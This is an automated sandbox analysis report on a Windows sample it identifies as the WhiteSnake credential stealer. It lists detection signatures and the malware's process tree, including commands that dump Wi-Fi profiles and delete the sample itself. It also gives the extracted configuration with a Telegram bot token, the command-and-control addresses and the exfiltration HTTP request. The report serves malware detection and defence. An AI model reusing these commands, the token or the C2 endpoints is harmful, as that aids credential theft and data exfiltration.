Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1550690
MD5:c426f46f2c074eda8c903f9868be046d
SHA1:d0352482370beff107eb2b2f13e2de275fbc91c7
SHA256:7cba781d569196e89a86f10cee7d69918fe05df1461d1f0ed3426ccb2046002e
Tags:exeuser-Bitsight
Infos:

Detection

WhiteSnake Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C426F46F2C074EDA8C903F9868BE046D)
    • cmd.exe (PID: 7436 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7640 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7684 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7692 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7736 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7780 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7796 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7812 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7972 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8020 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 8036 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup

Malware Configuration

Threatname: WhiteSnake

{"Version": "1.6.3.5", "Telegram Token": "7720988404:AAHJ1d0so4FzXOrfQavDsW60uUFev7BQSjU", "Telegram chatid": "1660795749", "C2 urls": ["http://147.124.221.201:8080"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: file.exe PID: 7260JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: file.exe PID: 7260JoeSecurity_WhiteSnakeYara detected WhiteSnake StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7260, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7436, ProcessName: cmd.exe
      Sigma detected: Invoke-Obfuscation VAR+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7260, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7436, ProcessName: cmd.exe
      Sigma detected: Communication To Uncommon Destination Ports
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 147.124.221.201, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

      Stealing of Sensitive Information

      barindex
      Sigma detected: Capture Wi-Fi password
      Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7260, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7436, ProcessName: cmd.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T03:07:01.191138+010020506021A Network Trojan was detected192.168.2.449731147.124.221.2018080TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T03:07:01.140283+010020506011A Network Trojan was detected192.168.2.449731147.124.221.2018080TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: file.exeAvira: detected
      Found malware configuration
      Source: 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: WhiteSnake {"Version": "1.6.3.5", "Telegram Token": "7720988404:AAHJ1d0so4FzXOrfQavDsW60uUFev7BQSjU", "Telegram chatid": "1660795749", "C2 urls": ["http://147.124.221.201:8080"]}
      Multi AV Scanner detection for domain / URL
      Source: http://185.217.98.121:80Virustotal: Detection: 12%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A7A21 CryptUnprotectData,0_2_00007FFD9B8A7A21
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A7B6D CryptUnprotectData,0_2_00007FFD9B8A7B6D
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B1E1Ah0_2_00007FFD9B8B1BFB
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B1661h0_2_00007FFD9B8AF356
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FFD9B8A6089
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FFD9B8A6029
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B527Dh0_2_00007FFD9B8B502A
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B0C09h0_2_00007FFD9B8B0607
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FFD9B8B3ADF
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B1661h0_2_00007FFD9B8B1279
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8A6C9Ch0_2_00007FFD9B8A6A99
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B2320h0_2_00007FFD9B8B229C
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B1661h0_2_00007FFD9B8B00A5
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec eax0_2_00007FFD9B8B163D
      Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 00007FFD9B8B1661h0_2_00007FFD9B8B0D8E

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.4:49731 -> 147.124.221.201:8080
      Source: Network trafficSuricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.4:49731 -> 147.124.221.201:8080
      Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.124.221.201:8080
      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 147.124.221.201:8080Content-Length: 134077Expect: 100-continueConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewASN Name: AC-AS-1US AC-AS-1US
      Source: unknownDNS query: name: ip-api.com
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownTCP traffic detected without corresponding DNS query: 147.124.221.201
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: unknownHTTP traffic detected: POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1Host: 147.124.221.201:8080Content-Length: 134077Expect: 100-continueConnection: Keep-Alive
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.126.19.171:80
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.43.160.136:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.161.20.142:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.101.219:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.151.109.160:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.145.17.167:9090
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.221.201:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.221.201:8080/sendData
      Source: file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.221.201:8080/sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==
      Source: file.exe, 00000000.00000002.1710856387.000001D7A756B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.221.201:80802
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.185.29:80
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://159.203.174.113:8090
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.235.70.96:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.138.211.88:8099
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.228.80.130:80
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:80
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.98.121:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.164.198.113:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.78.55.47:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.166.251.4:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.38.221.184:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.207.174.88:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.60.191.38:80
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.87.207.180:9090
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.235.26.83:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.96.78.224:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.159.4.50:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.205.24:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.230.176.97:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.216.92.21:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.219.110.16:9999
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8.222.143.111:8080
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7397000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: file.exe, 00000000.00000002.1710856387.000001D7A758C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1713584178.000001D7B74D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
      Source: file.exe, 00000000.00000002.1713584178.000001D7B740A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
      Source: file.exe, 00000000.00000002.1713584178.000001D7B73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
      Source: file.exe, 00000000.00000002.1713584178.000001D7B740A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
      Source: file.exe, 00000000.00000002.1713584178.000001D7B73E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
      Source: file.exe, 00000000.00000002.1713584178.000001D7B7442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1713584178.000001D7B74D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
      Source: file.exe, 00000000.00000002.1713584178.000001D7B74E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

      System Summary

      barindex
      .NET source code contains very large strings
      Source: file.exe, oNAMlo.csLong String: Length: 11394
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8AB115 NtQueryInformationToken,0_2_00007FFD9B8AB115
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A9D2B NtQueryInformationToken,0_2_00007FFD9B8A9D2B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A9D22 NtClose,0_2_00007FFD9B8A9D22
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8AE3F9 NtClose,0_2_00007FFD9B8AE3F9
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8AB305 NtQueryInformationToken,0_2_00007FFD9B8AB305
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A304C0_2_00007FFD9B8A304C
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A72850_2_00007FFD9B8A7285
      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Load DriverJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: SecurityJump to behavior
      Source: file.exe, 00000000.00000002.1723816368.000001D7BFF6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
      Source: file.exe, 00000000.00000000.1668471112.000001D7A5712000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameq1b1f46dc103cd7a4b836032461987dde3b.exeh$ vs file.exe
      Source: file.exeBinary or memory string: OriginalFilenameq1b1f46dc103cd7a4b836032461987dde3b.exeh$ vs file.exe
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/3@1/2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8A9C62 AdjustTokenPrivileges,0_2_00007FFD9B8A9C62
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD9B8AED85 AdjustTokenPrivileges,0_2_00007FFD9B8AED85
      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\o08k2d5ob5Jump to behavior
      Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\11ll02lod7
      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exe, 00000000.00000002.1710856387.000001D7A7387000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
